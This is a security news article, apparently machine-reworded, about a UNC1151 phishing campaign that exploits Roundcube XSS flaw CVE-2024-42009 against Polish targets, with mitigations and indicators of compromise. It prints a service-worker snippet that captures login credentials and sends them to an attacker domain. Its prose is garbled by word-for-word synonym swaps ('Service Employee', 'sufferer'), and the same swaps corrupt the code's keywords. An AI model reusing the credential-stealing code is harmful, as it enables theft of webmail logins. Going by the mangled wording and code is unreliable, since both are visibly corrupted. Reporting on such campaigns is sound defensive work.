A current spearphishing marketing campaign focusing on Polish entities has been attributed with excessive confidence to the UNC1151 menace actor, a bunch linked to Belarusian state pursuits and, in response to some sources, Russian intelligence companies.
CERT Polska stories that the attackers leveraged a important vulnerability within the Roundcube webmail platform—CVE-2024-42009—to steal person credentials with minimal person interplay.
The phishing emails have been crafted to look pressing, utilizing topics like “[!IMPORTANT] Bill to reservation quantity: S2500650676,” and required solely that the recipient open the message for the exploit to set off.
.png
)
The vulnerability allowed malicious JavaScript embedded within the e-mail to execute within the sufferer’s browser, bypassing normal sanitization mechanisms.
CVE-2024-42009 and Assault Circulate
CVE-2024-42009 is a important Cross-Website Scripting (XSS) vulnerability affecting Roundcube variations as much as 1.5.7 and 1.6.x as much as 1.6.7.
The flaw arises from a desanitization bug within the message_body() perform, the place improper dealing with of HTML attributes allowed attackers to inject and execute arbitrary JavaScript code.
Sonar safety researchers first reported this concern and has a CVSS v3.1 rating of 9.3, reflecting its excessive danger.
The assault chain, as noticed by CERT Polska, unfolded in two key phases:
- Preliminary Exploit and Service Employee Set up
Upon opening the malicious e-mail, the sufferer’s browser executed JavaScript that registered a Service Employee utilizing a code snippet just like: xmlThis Service Employee, hosted as an attachment, enabled persistent background entry to webmail classes. - Credential Harvesting by way of Service Employee
The Service Employee intercepted login POST requests, capturing person credentials and exfiltrating them to an attacker-controlled area: javascriptself.addEventListener('fetch', occasion => { if (occasion.request.methodology === 'POST') { const cloned = occasion.request.clone(); cloned.textual content().then(bodyText => { const params = new URLSearchParams(bodyText); const person = params.get('username') || params.get('_user'); const move = params.get('password') || params.get('_pass'); fetch('https://a.mpk-krakow.pl/creds', { physique: JSON.stringify({ login: person, password: move }), // ... }); }); } });This allowed attackers to gather credentials as customers tried to log in to their professional webmail portals.
| Vulnerability | Kind | Affected Variations | Assault Vector | Affect | Patch Model |
|---|---|---|---|---|---|
| CVE-2024-42009 | XSS | ≤1.5.7, 1.6.x ≤1.6.7 | Malicious Electronic mail | Credential theft, session hijack | 1.6.8, 1.5.8 |
| CVE-2025-49113 | RCE (PHP Deserialization) | ≤1.6.10 | Authenticated Consumer | Full server compromise | 1.6.11, 1.5.10 |
CVE-2025-49113 and Defensive Measures
Whereas no exploitation of the newly found CVE-2025-49113 has been noticed, this vulnerability permits authenticated attackers to execute arbitrary code on the server by way of unsafe PHP object deserialization, posing a danger of full webmail server takeover.
Safety consultants warn that chaining this with credential theft may allow devastating assaults.
Suggestions:
- Replace Roundcube to at the very least model 1.6.11 or 1.5.10 to mitigate each vulnerabilities.
- Evaluation logs for connections to
a.mpk-krakow[.]pland different indicators of compromise. - Reset passwords and unregister suspicious Service Employees by way of browser developer instruments.
- Report incidents to the suitable CSIRT authority if focused.
Indicators of Compromise (IoC):
- Malicious sender addresses:
irina.vingriena@gmail[.]com,julitaszczepanska38@gmail[.]com - Credential harvesting area:
a.mpk-krakow[.]pl - SHA256 of malicious JS:
70cea07c972a30597cda7a1d3cd4cd8f75acad75940ca311a5a2033e6a1dd149.
The UNC1151 marketing campaign underscores the important significance of well timed patching and vigilant monitoring of webmail platforms, particularly these extensively utilized in authorities and enterprise environments.
To Improve Your Cybersecurity Expertise, Take Diamond Membership With 150+ Sensible Cybersecurity Programs On-line – Enroll Right here
![AI advertising campaigns solely a bot may launch & which instruments pitch the most effective ones [product test]](https://blog.aimactgrow.com/wp-content/uploads/2025/06/ai-marketing-campaigns.webp-120x86.webp)
